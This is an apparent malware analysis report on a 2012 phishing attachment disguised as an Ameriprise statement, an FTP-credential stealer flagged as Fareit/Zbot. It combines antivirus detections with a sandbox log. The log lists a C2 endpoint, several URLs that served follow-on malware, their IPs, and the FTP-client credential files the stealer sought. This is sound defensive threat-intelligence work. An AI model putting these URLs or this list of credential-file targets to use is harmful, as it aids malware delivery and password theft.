--------------------------------------------------------------------------------
#MalwareMustDie !!! (analysis by @c_APT_ure)
--------------------------------------------------------------------------------

Analysis summary: (details see further below...)
=================

Initial infector: email attachment (exe in zip)

Date:       Mon 2012-10-29 15:03
From:       Ameriprise Documents [noreply@mail.ameriprise.com]
Subject:    A new account statement is available
Attachment: PDF-Ameriprise-Financial-51322492F36.zip
            (account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe)

Analysis --> http://malwr.com/analysis/841b0eb462c444dc2a6fab52ff5a3e36/

https://www.virustotal.com/file/6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04/analysis/
Detection ratio: 26 / 44   Analysis date: 2012-10-30 11:05:06 UTC ( 1 hour, 16 minutes ago )
Detection ratio: 29 / 44   Analysis date: 2012-10-30 12:42:50 UTC ( 20 minutes ago )

Indicators:

* DNS requests... --> malware domains
  3.gutterkings.org (173.246.104.21)
  brianjameswhite.com (97.74.215.61)
  estilianaragdolls.de (217.119.58.37)
  kuntticaret.com (94.199.206.44)
  www.gamarubber.com (212.36.8.230)
  www.10130138.wavelearn.de (213.157.16.3)
  hotnewinfo.info (174.120.83.189)
  saltasalta.cl (200.29.152.130)

* C2 checkin (?)
  URL:  http://3.gutterkings.org/forum/viewtopic.php
  TYPE: POST
  UA:   Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

* Downloads further malware...
  http://brianjameswhite.com/7VTUy.exe
  http://estilianaragdolls.de/Si7ySG.exe
  http://kuntticaret.com/v6e7WMJ.exe
  http://www.gamarubber.com/NPY.exe
  http://www.10130138.wavelearn.de/4pxp.exe
  http://hotnewinfo.info/8fhr0.exe
  http://saltasalta.cl/8Mo.exe

* all malware exe's are the same...
$ md5sum Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe
f60566d2de1a221a37ddbcd880e8a184  Si7ySG.exe
f60566d2de1a221a37ddbcd880e8a184  v6e7WMJ.exe
f60566d2de1a221a37ddbcd880e8a184  NPY.exe
f60566d2de1a221a37ddbcd880e8a184  4pxp.exe
f60566d2de1a221a37ddbcd880e8a184  8fhr0.exe
f60566d2de1a221a37ddbcd880e8a184  8Mo.exe

https://www.virustotal.com/file/254843c2772aeec76e3704c1f1852f490fcc1535dbc7c08fbeb9f7cef16ce7a3/analysis/
Detection ratio: 11 / 44   Analysis date: 2012-10-29 14:12:36 UTC ( 22 hours, 26 minutes ago )
https://www.virustotal.com/file/254843c2772aeec76e3704c1f1852f490fcc1535dbc7c08fbeb9f7cef16ce7a3/analysis/1351600846/
Detection ratio: 29 / 43   Analysis date: 2012-10-30 12:40:46 UTC ( 1 minute ago )

Analysis --> http://malwr.com/analysis/f60566d2de1a221a37ddbcd880e8a184/

--------------------------------------------------------------------------------

https://www.virustotal.com/file/6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04/analysis/

SHA256:    6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04
SHA1:      14b5a33be8edce970337c09545c900c65a128c94
MD5:       841b0eb462c444dc2a6fab52ff5a3e36
File size: 166.0 KB ( 169984 bytes )
File name: account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe
File type: Win32 EXE
Tags:      peexe mz
Detection ratio: 26 / 44
Analysis date:   2012-10-30 11:05:06 UTC ( 1 hour, 16 minutes ago )

AhnLab-V3             Trojan/Win32.Tepfer                 20121029
AntiVir               TR/Agent.169984.24                  20121030
Avast                 Win32:Trojan-gen                    20121030
BitDefender           Trojan.Generic.KDV.774615           20121030
CAT-QuickHeal         (Suspicious) - DNAScan              20121030
Commtouch             W32/Trojan3.EEK                     20121030
Comodo                UnclassifiedMalware                 20121030
DrWeb                 Trojan.PWS.Stealer.946              20121030
Emsisoft              Trojan.Win32.Agent (A)              20121030
ESET-NOD32            Win32/PSW.Agent.NTM                 20121030
F-Prot                W32/Trojan3.EEK                     20121030
F-Secure              Trojan:W32/Agent.DUFZ               20121030
GData                 Trojan.Generic.KDV.774615           20121030
Ikarus                Trojan-PWS.Multi                    20121030
Kaspersky             Trojan-PSW.Win32.Tepfer.boxb        20121030
McAfee                Generic PWS.o                       20121030
McAfee-GW-Edition     Artemis!841B0EB462C4                20121030
Microsoft             PWS:Win32/Fareit                    20121030
MicroWorld-eScan      Trojan.Generic.KDV.774615           20121030
PCTools               Trojan.Zbot                         20121030
Sophos                Troj/Zbot-CWP                       20121030
Symantec              Trojan.Zbot                         20121030
TrendMicro            TSPY_FAREIT.EG                      20121030
TrendMicro-HouseCall  TSPY_FAREIT.EG                      20121030
VIPRE                 Win32.Malware!Drop                  20121030
ViRobot               Trojan.Win32.A.PSW-Tepfer.169984    20121030

Symantec Reputation   Suspicious.Insight
F-Secure Deepguard    Suspicious:W32/Malware!Online

First seen by VirusTotal: 2012-10-29 15:09:13 UTC ( 21 hours, 27 minutes ago )
Last seen by VirusTotal:  2012-10-30 12:21:18 UTC ( 15 minutes ago )

File names (max. 25):
  841b0eb462c444dc2a6fab52ff5a3e36
  account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe
  account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe
  841b0eb462c444dc2a6fab52ff5a3e36
  account.exe
  file-4705036_exe

File system activity
--------------------

Opened files...
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
C:\Documents and Settings\\Application Data\CuteFTP\sm.dat (failed)
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat (failed)
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)
C:\Program Files\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat (failed)
C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat (failed)
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat (failed)
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat (failed)
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml (failed)
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml (failed)
C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml (failed)
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml (failed)
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml (failed)
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml (failed)
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml (failed)
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml (failed)
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml (failed)
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js (failed)
C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js (failed)
C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js (failed)
C:\Documents and Settings\\Application Data\SharedSettings.ccs (failed)
C:\Documents and Settings\\Application Data\SharedSettings.sqlite (failed)
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite (failed)
C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs (failed)
C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite (failed)
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite (failed)
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs (failed)
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite (failed)
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite (failed)
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs (failed)
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed)
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed)
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs (failed)
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed)
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed)
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs (failed)
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed)
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed)
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed)
C:\WINDOWS\32BitFtp.ini (failed)
C:\WINDOWS\Registration\R000000000007.clb (successful)
c:\autoexec.bat (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash (failed)
C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful)
\\.\PIPE\wkssvc (successful)
\\.\MountPointManager (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful)
\\.\Ip (successful)
C:\Documents and Settings\\Local Settings\Application Data\lejoy.zuh.dat (failed)
C:\6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful)
C:\WINDOWS\ (successful)
C:\Documents and Settings\\Application Data\Ytqi (successful)
C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful)
C:\Documents and Settings\\Local Settings\Application Data\lejoy.zuh (successful)
C:\Documents and Settings\\Local Settings\Application Data (successful)
C:\Documents and Settings\\Application Data (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful)
C:\WINDOWS\system32\cmd.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (failed)
C:\Documents and Settings\\Application Data\Omce (successful)
C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful)
C:\Documents and Settings\\Local Settings\Application Data\lerik.keo (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat (successful)
C:\WINDOWS\system32\rsaenh.dll (successful)
C:\WINDOWS\system32\winsock.dll (successful)

Read files...
C:\WINDOWS\Registration\R000000000007.clb (successful)
c:\autoexec.bat (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful)
C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful)
C:\WINDOWS\system32\rsaenh.dll (successful)
C:\WINDOWS\system32\winsock.dll (successful)

Written files...
C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful)
C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful)
C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat (successful)

Deleted files...
C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful)
C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful)

Registry activity
-----------------

Set keys...
KEY: HKEY_CURRENT_USER\Software\WinRAR\HWID
  TYPE: REG_BINARY  VALUE:  (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
  TYPE: REG_SZ  VALUE: C:\Documents and Settings\\My Documents (successful)
KEY: HKEY_CURRENT_USER\Software\WinRAR\Client Hash
  TYPE: REG_BINARY  VALUE:  (successful)
KEY: HKEY_CURRENT_USER\Software\WinRAR\7A9494DFE7BB3840D49ED0306194A6D8
  TYPE: REG_BINARY  VALUE:  (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\\BaseClass
  TYPE: REG_SZ  VALUE: Drive (successful)
KEY: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents
  TYPE: REG_SZ  VALUE: C:\Documents and Settings\All Users\Documents (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
  TYPE: REG_SZ  VALUE: C:\Documents and Settings\\Desktop (successful)
KEY: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Desktop
  TYPE: REG_SZ  VALUE: C:\Documents and Settings\All Users\Desktop (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass
  TYPE: REG_DWORD  VALUE: 1 (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName
  TYPE: REG_DWORD  VALUE: 1 (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet
  TYPE: REG_DWORD  VALUE: 1 (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe
  TYPE: REG_SZ  VALUE: hundred thoseWell (successful)
KEY: HKEY_CURRENT_USER\Software\Microsoft\Ebqa\2db39j1f
  TYPE: REG_SZ  VALUE: 6NukTsmlmWPs7VPO (successful)

Process activity
----------------

Created processes...
C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe" " (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe" " (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe" " (failed)
C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe" " (failed)
C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe" " (failed)
C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe  C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe" " (failed)
C:\Documents and Settings\\Application Data\Ytqi\eljez.exe"" (successful)
C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat"" (successful)
C:\Documents and Settings\\Application Data\Omce\ohiw.exe"" (successful)
C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat"" (successful)

Shell commands...
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe(null) [(null)] (successful)
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe(null) [(null)] (successful)
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe(null) [(null)] (successful)
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe(null) [(null)] (successful)
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe(null) [(null)] (successful)
(open) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe(null) [(null)] (successful)

Code injections in the following processes...
eljez.exe (successful)
83690.exe (successful)
84461.exe (successful)
84922.exe (successful)
86213.exe (successful)
explorer.exe (successful)
79844.exe (successful)
ohiw.exe (successful)
VBoxTray.exe (successful)
cmd.exe (successful)
wscntfy.exe (successful)
python.exe (successful)
6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful)
dwwin.exe (successful)
6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (failed)

Mutex activity
--------------

Created mutexes...
Global\{5E370004-F236-408B-8F92-61FCBA8C42EE} (successful)
Global\{D800CEC9-3CFB-C6BC-F107-B06DC419937F} (successful)
Global\{D800CEC9-3CFB-C6BC-810B-B06DB415937F} (successful)
Global\{D800CEC9-3CFB-C6BC-6D0C-B06D5812937F} (successful)
Global\{D800CEC9-3CFB-C6BC-190B-B06D2C15937F} (successful)
Global\{CB561546-E774-D5EA-8F92-61FCBA8C42EE} (successful)
Local\{744F300D-C23F-6AF3-8F92-61FCBA8C42EE} (successful)
Global\{D800CEC9-3CFB-C6BC-0508-B06D3016937F} (successful)
Global\{D800CEC9-3CFB-C6BC-7509-B06D4017937F} (successful)
Global\{D800CEC9-3CFB-C6BC-490A-B06D7C14937F} (successful)
Global\{D800CEC9-3CFB-C6BC-610A-B06D5414937F} (successful)
Global\{D800CEC9-3CFB-C6BC-8D0A-B06DB814937F} (successful)
Global\{D800CEC9-3CFB-C6BC-990A-B06DAC14937F} (successful)
Global\{D800CEC9-3CFB-C6BC-390B-B06D0C15937F} (successful)
Global\{D800CEC9-3CFB-C6BC-650B-B06D5015937F} (successful)
Global\{D800CEC9-3CFB-C6BC-B90B-B06D8C15937F} (successful)
Global\{D800CEC9-3CFB-C6BC-150C-B06D2012937F} (successful)
Global\{D800CEC9-3CFB-C6BC-4D0C-B06D7812937F} (successful)
Global\{D800CEC9-3CFB-C6BC-7D0C-B06D4812937F} (successful)
Global\{D800CEC9-3CFB-C6BC-B10D-B06D8413937F} (successful)
Global\{D800CEC9-3CFB-C6BC-250E-B06D1010937F} (successful)
Global\{D800CEC9-3CFB-C6BC-650E-B06D5010937F} (successful)
Global\{D800CEC9-3CFB-C6BC-ED08-B06DD816937F} (successful)
Global\{D800CEC9-3CFB-C6BC-ED0B-B06DD815937F} (successful)
Global\{D800CEC9-3CFB-C6BC-090D-B06D3C13937F} (successful)
Global\{D800CEC9-3CFB-C6BC-BD0E-B06D8810937F} (successful)
Global\{D800CEC9-3CFB-C6BC-690F-B06D5C11937F} (successful)
Global\{D800CEC9-3CFB-C6BC-DD09-B06DE817937F} (successful)
Global\{D800CEC9-3CFB-C6BC-990F-B06DAC11937F} (successful)
Global\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (successful)
Global\{38E3341C-C62E-265F-8F92-61FCBA8C42EE} (successful)
Global\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (successful)
Global\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (successful)
Local\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (successful)
Local\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (successful)
Global\{D800CEC9-3CFB-C6BC-5D03-B06D681D937F} (successful)
Global\{D800CEC9-3CFB-C6BC-550F-B06D6011937F} (successful)

Opened mutexes...
Global\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (failed)
Local\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (failed)
Global\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (failed)
Local\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (failed)
Global\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (failed)
Local\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (failed)
Global\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (failed)
Local\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (failed)
Global\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (failed)
Local\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (failed)
ShimCacheMutex (successful)

Windows service activity
------------------------

Opened service managers...
MACHINE: localhost  DATABASE: SERVICES_ACTIVE_DATABASE (successful)

Opened services...
ProtectedStorage (successful)

Runtime DLLs
------------
ole32.dll (successful)
crypt32.dll (successful)
advapi32.dll (successful)
shell32.dll (successful)
netapi32.dll (successful)
kernel32.dll (successful)
msi.dll (successful)
rpcrt4.dll (successful)
c:\6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful)
pstorec.dll (successful)
secur32.dll (successful)
userenv.dll (successful)
clbcatq.dll (successful)
comctl32.dll (successful)
riched20.dll (successful)
wininet.dll (successful)
version.dll (successful)
c:\windows\system32\mswsock.dll (successful)
hnetcfg.dll (successful)
c:\windows\system32\wshtcpip.dll (successful)
dnsapi.dll (successful)
c:\windows\system32\winrnr.dll (successful)
rasadhlp.dll (successful)
netapi32 (successful)
setupapi.dll (successful)
user32.dll (successful)
shlwapi.dll (successful)
gdi32.dll (successful)
ws2_32.dll (successful)
oleaut32.dll (successful)
iphlpapi.dll (successful)
msvcrt.dll (successful)
ntdll.dll (successful)
rsaenh.dll (successful)

Additional details
------------------
The file uses the IsDebuggerPresent Windows API function in order to see whether it is being debugged.
The file sends control codes directly to certain device drivers making use of the DeviceIoControl Windows API function.

Network activity
----------------

HTTP requests...
URL: http://3.gutterkings.org/forum/viewtopic.php
  TYPE: POST  UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://brianjameswhite.com/7VTUy.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://estilianaragdolls.de/Si7ySG.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://kuntticaret.com/v6e7WMJ.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://www.gamarubber.com/NPY.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://www.10130138.wavelearn.de/4pxp.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://hotnewinfo.info/8fhr0.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://saltasalta.cl/8Mo.exe
  TYPE: GET   UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

DNS requests...
3.gutterkings.org (173.246.104.21)
brianjameswhite.com (97.74.215.61)
estilianaragdolls.de (217.119.58.37)
kuntticaret.com (94.199.206.44)
www.gamarubber.com (212.36.8.230)
www.10130138.wavelearn.de (213.157.16.3)
hotnewinfo.info (174.120.83.189)
saltasalta.cl (200.29.152.130)

TCP connections...
173.246.104.21:80
97.74.215.61:80
217.119.58.37:80
94.199.206.44:80
212.36.8.230:80
213.157.16.3:80
174.120.83.189:80
200.29.152.130:80

UDP communications...
:53
209.255.152.66:17245
151.75.211.167:20817
76.177.215.185:25494
107.192.246.70:21834
108.198.141.10:27666

--------------------------------------------------------------------------------

http://malwr.com/analysis/841b0eb462c444dc2a6fab52ff5a3e36/

Analysis
--------
Package:     None specified, automatically selected
Analyzed on: 2012-10-29 08:24:01 PST
Duration:    165 seconds

File name: account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe
File size: 169984 bytes
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:       841b0eb462c444dc2a6fab52ff5a3e36
SHA1:      14b5a33be8edce970337c09545c900c65a128c94
SHA256:    6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04
SHA512:    2fad064f3b137a68b9a423c56240eda2ee84bb61d880262955af827d02949a38c149cdb72a7e53dd0f016778ace7b7eee8cf436b7bbe6558d547707b1a3b752f
CRC32:     1125A89D
Ssdeep:    3072:xBJweE28AKzPgX+tP1KU4BcmI4wY82pVOBqwmy75+pFL:xBJwGKEuB4FPpVtw7op

Involved Hosts (IP Address)
---------------------------
0.0.0.0  255.255.255.255  10.0.2.2  10.0.2.15  239.255.255.250  224.0.0.22  10.0.2.255
173.246.104.21  97.74.215.61  217.119.58.37  209.255.152.66  151.75.211.167  76.177.215.185
107.192.246.70  108.198.141.10  74.167.73.210  88.75.145.198  84.221.201.209  94.199.206.44
212.36.8.230  66.219.11.78  99.244.152.48  213.157.16.3  174.120.83.189  64.191.132.50
200.29.152.130  99.174.233.11  76.5.130.26  75.73.59.26  195.169.125.228  67.71.10.219
90.173.50.23  70.138.242.12  78.188.43.119  96.246.54.170  67.82.110.139  74.125.141.106
66.235.184.138  87.29.248.48  216.98.102.194  119.207.250.61  97.73.181.51  75.151.131.29
98.245.68.61  67.68.17.116  68.55.47.14  79.15.105.167  108.17.156.159  99.95.77.238

Network Analysis
----------------

DNS Requests
Hostname                    IP Address
3.gutterkings.org           173.246.104.21
brianjameswhite.com         97.74.215.61
estilianaragdolls.de        217.119.58.37
kuntticaret.com             94.199.206.44
